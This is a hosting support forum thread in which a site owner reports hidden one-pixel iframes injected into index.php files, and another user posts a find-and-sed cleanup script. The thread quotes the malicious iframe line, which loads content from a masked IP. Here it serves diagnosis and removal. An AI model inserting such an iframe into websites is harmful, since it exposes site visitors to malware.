Security issue

[sewetrev]

I seem to have someone adding iframes to the end of my index.php files, for example:

HTML Code:

<iframe width=1 height=1 border=0 frameborder=0 src='http://xxx.xxx.xxx.xxx/tds/index.php'></iframe>

this happened previously on a number of sites and i was told that i needed to change all the ftp passwords which i did. and was assured it had been deleted.

please can you advise asap because i have clients sites with errors stating "malware threat" and they aren't happy.

[Gallier]

You and your clients need to remove TROJAN (use antivirus ), then to change FTP passwords

and

create file fix.sh with:

Quote:

#!/bin/sh

for f in `find . -type f -exec egrep -q xxx.xxx.xxx.xxx {} \; -print`; do
echo $f
sed -i "" -e "s|<iframe width=1 height=1 border=0 frameborder=0 src='http://xxx.xxx.xxx.xxx/tds/index.php'></iframe>||g" $f
done

put fix.sh in main directory (like /home/www/[fix.sh]/user_site)

Quote:

chmod +x fix.sh

and run (/home/www/fix.sh)

try it

[eUK-Alan]

Hello

I have updated your support request including necessary tweaks to be implemented on wordpress site. Please let us know if you need further assistance.